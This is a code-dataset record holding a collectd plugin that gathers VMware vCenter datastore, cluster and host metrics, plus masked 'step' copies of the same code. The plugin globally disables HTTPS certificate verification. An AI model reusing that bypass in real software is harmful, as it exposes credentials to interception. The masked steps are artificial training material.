True\n\t\t\t\telif timer == c['End'] and pushed_keys[c['State']]:\n\t\t\t\t\tprint(\"releasing \"+c['State'])\n\t\t\t\t\tReleaseKey(dk[config[c['State']]])\n\t\t\t\t\tpushed_keys[c['State']] = False",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# collectd-vcenter - vcenter.py
#
# Author : Loic Lambiel @ exoscale
# Contributor : Josh VanderLinden
# Description : This is a collectd Python module to gather stats from VMware
# vCenter
import logging
import ssl
import time
from pysphere import VIServer
try:
import collectd
COLLECTD_ENABLED = True
except ImportError:
COLLECTD_ENABLED = False
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
MB = 1024 ** 2
HOST_STATUS = ('green', 'gray', 'yellow', 'red')
class Collector(object):
def __init__(self, vcenters, username=None, password=None,
verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {
'datastore': {},
'datacenter': {},
}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.capacity',
'summary.freeSpace',
], from_node=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
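            # Worked example (illustrative figures): capacity=512000 MB with
            # free=128000 MB gives usage = (512000 - 128000) / 512000 * 100 = 75.0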
return {
'capacity': capacity,
'free': free,
'used': capacity - free,
'usage': usage,
}
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
else:
if 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
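        # e.g. a datacenter-level mem_percent of 40 merged with a cluster-level
        # value of 60 yields (40 + 60) / 2 = 50 (illustrative numbers only)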
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
# change collection behavior based on the type of group we're dealing
# with
if group_type == 'datacenter':
# find each cluster in the datacenter
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
# find each host in the datacenter or cluster
            find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
# initialize some metrics
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
# iterate over each child node in this object group
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
# aggregate data from each child to the top level
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
# recalculate percentages
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
# return the current metrics for this group
group_stats = {
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
child_type: child_stats,
}
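        # For a cluster this nests per-host metrics under the 'host' key, so a
        # caller can read e.g. group_stats['host']['esx01']['cpu_percent']
        # ('esx01' is an illustrative host name).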
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize',
'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz',
], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
        # guard against division by zero when the host reports no CPU/memory info
        cpu_percent = cpu_usage / float(cpu_total) * 100 if cpu_total else 0
        mem_percent = mem_usage / float(mem_total) * 100 if mem_total else 0
stats = {
'status': status,
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'cpu_count': cpu_count,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
        # pop sleep_time so it is not forwarded to Collector.__init__, which
        # does not accept it
        self.sleep_time = kwargs.pop('sleep_time', 20)
        super(CollectdCollector, self).__init__(*args, **kwargs)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
# report information for all vCenter servers
for vcenter, data in info.items():
# report datastore information
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
# report datacenter information
for dc_name, dc_data in data['datacenter'].items():
# extract any cluster and host information for later processing
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
# report cluster information
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
# report host information
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {
logging.CRITICAL: collectd.error,
logging.ERROR: collectd.error,
logging.WARN: collectd.warning,
logging.INFO: collectd.info,
logging.DEBUG: collectd.info,
}
def emit(self, record):
if not COLLECTD_ENABLED:
return
        # LogRecord stores the numeric level in .levelno (not .level)
        if record.levelno == logging.DEBUG and not self.verbose:
            return
        handler = self._handler_map[record.levelno]
handler(record.getMessage())
if COLLECTD_ENABLED:
instance = CollectdCollector([])
collectd.register_config(instance.configure)
collectd.register_read(instance.read)
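# Standalone usage sketch (added for illustration): when run directly without
# collectd, the Collector can be exercised on its own. The host name and
# credentials are placeholders, not values taken from this module.
if __name__ == '__main__' and not COLLECTD_ENABLED:
    standalone = Collector(['vcenter.example.com'],
                           username='readonly',
                           password='changeme',
                           verbose=True)
    print(standalone.poll())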
|
normal
|
{
"blob_id": "55f76ae1ffe0fb2d2ca2c7a20aab45ffb00cf178",
"index": 613,
"step-1": "<mask token>\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Collector(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n 
for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None, verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n stats = {'datastore': {}, 'datacenter': {}}\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n return stats\n <mask token>\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n if '.' in name:\n name = name.split('.')[0]\n stats = self._poll_group('datacenter', server, obj, name)\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n elif 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. 
This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n if group_type == 'datacenter':\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':\n mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,\n 'vms_running': vms_running, 'vms_stopped': vms_stopped,\n child_type: child_stats}\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' 
in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric 
sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
